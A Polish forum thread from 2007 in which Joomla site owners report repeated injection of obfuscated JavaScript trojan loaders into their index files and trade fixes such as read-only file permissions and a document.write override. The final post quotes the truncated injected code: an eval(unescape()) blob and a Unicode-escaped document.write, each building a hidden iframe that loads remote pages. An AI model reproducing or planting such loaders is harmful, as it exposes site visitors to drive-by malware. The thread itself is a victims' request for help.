Włam do joomla, loader trojanów

**nibas** · 10-05-2007, 01:20

Od kilku dni mam problemy na swojej stronie. Sprawa wygląda tak:

Najpierw dostałem monity, że ładują się trojany na stronie...
Sprawdziłem kod.. w index.php znalazłem

<script language="JavaScript">e = '0x00' + '54';str1 = "%EF%B7%BC%A1%CB............itd

Usunąłem, zainstalowałem najnowszą joomle, zupdatowałem komponenty...
Dzisiaj znalazłem znowu ten kod, ale tym razem w templatkach, byl tam w index.php...

Czy ktos może to odkodować?
Jak zablokować możliwość edytowania index.php w templatkach?
Ewentualnie jak sie przed tym bronić...

**marco** · 10-05-2007, 08:24

TUTAJ znajdziesz opis problemu i skrypty które można wkleić aby się przed tym uchronić

**nibas** · 11-05-2007, 11:11

Jak narazie udało mi się rozwiązać problem bez takich drastycznych środków

Jak sprawa się potoczy dalej nie wiem... aktualnie wszystko wróciło do normy.

**Atech** · 17-10-2007, 22:48

:mad:Mam ten sam problem,najpierw coś mi podmieniało plik index.php, teraz robi się dodatkowo wpis na końcu tego pliku <script type="text/javascript">document.write('\u003c\u0069\......... .</script> , <script>eval(unescape("%77%..................")) ; </script>. Zaktualizowalem joomle do wersji joomla_1.0.13_JIE-pl-utf dalo to efekt ale tylko jednodniowy.Pytanie od czego sie to mogło stać,jak sie przed tym ustrzec?
gdzie dokladnie mam wstawić ten wpis??
moja strona to www.conttato.com.pl

**kamax** · 18-10-2007, 07:16

nibas to może byś się podzielił tym jak Ci się udało rozwiązać ten problem, a nie tylko chwalisz się, że sprawa rozwiązana i jest fajnie. Chciałeś pomocy na forum, to może też pomóż innym wzamian

**kkmm1** · 18-10-2007, 08:39

2 najlepsze rady to:

1. link podany przez marco to nie jest takie trudne
2. ograniczenia zalozyc na pliki - zmienic chmoda na 444 dla pliku index (lub innych w ktorych nie chcecie grzebac) wtedy wszyscy beda mogli tylko czytac plika a nie zapisywac na nim nic

... osobiscie stosuje oba rozwiazania w zaleznosci od potrzeb

**alex51** · 19-10-2007, 16:57

Wysłane przez kkmm1

1. link podany przez marco to nie jest takie trudne

Oczywiście, ale wyłącznie dla znających język angielski.

Korzystając z translatora on-line otrzymałem tłumaczenie całkowicie niezrozumiałe i bez sensu. Jeśli ktoś znalazłby chwile czasu aby zamieścić tutaj sensowne tłumaczenie, to zapewne wiele osób wyraziłoby swoją wdzięczność.

**kkmm1** · 19-10-2007, 17:25

Najprosciej jak sie da:

W index.php wrzucasz w czesci "head" kod

Kod HTML:

 <script type="text/javascript">
function disableDocWrite () {
  document.oldDocumentWrite = document.write;
  document.write = function () {};
}
function enableDocWrite () {
  document.write = document.oldDocumentWrite;
}
disableDocWrite();
</script>

To co oni tam wypisuja to jaki maja problem oraz co zrobic aby nadpisywac tymczasowo za pomoca js itp - niepotrzebne standardowemu uzytkownikowi (czytaj. tobie rowniez)

**alex51** · 19-10-2007, 18:51

Wielkie dzięki za zrozumienie problemu i szybkość reakcji.

**Atech** · 29-10-2007, 10:17

Nic z tego wpisuje ten skrypt podany przez marco do plików index.php ,idex.html. Może źle to jakoś robię. We wszystkich plikach index.* wrzuca mi sie nadal złośliwy wpis:
<script>eval(unescape("%77%69%6e%64%6f%77%2e%73%74 %61%74%75
%73%3d%27%44%6f%6e%65%27%3b%64%6f%63%75%6d%65%6e%7 4%
2e%77%72%69%74%65%28%27%3c%69%66%72%61%6d%65%20%6e %
61%6d%65%3d%62%64%35%20%73%72%63%3d%5c%27%68%74%74 %
70%3a%2f%2f%61%6c%6c%74%72%61%66%66%2e%72%75%2f%6c %6
f%6c%2e%70%68%70%3f%27%2b%4d%61%74%68%2e%72%6f%75% 6e
%64%28%4d%61%74%68%2e%72%61%6e%64%6f%6d%28%29%2a%3 9
%34%38%33%31%29%2b%27%35%5c%27%20%77%69%64%74%68%
......")); </script>
Plus dodatkowo:
<script type="text/javascript">document.write('\u003c\u0069\u0066\u00 72\u0061\u006d\u0065
\u0020\u0073\u0072\u0063\u003d\u0022\u0068\u0074\u 0074\u0070\u003a
\u002f\u002f\u0074\u0072\u0066\u0066\u0063\u002e\u 006f\u0072\u0067...')</script>

Temat: Włam do joomla, loader trojanów

Przybornik

Widok

Włam do joomla, loader trojanów

Reguły pisania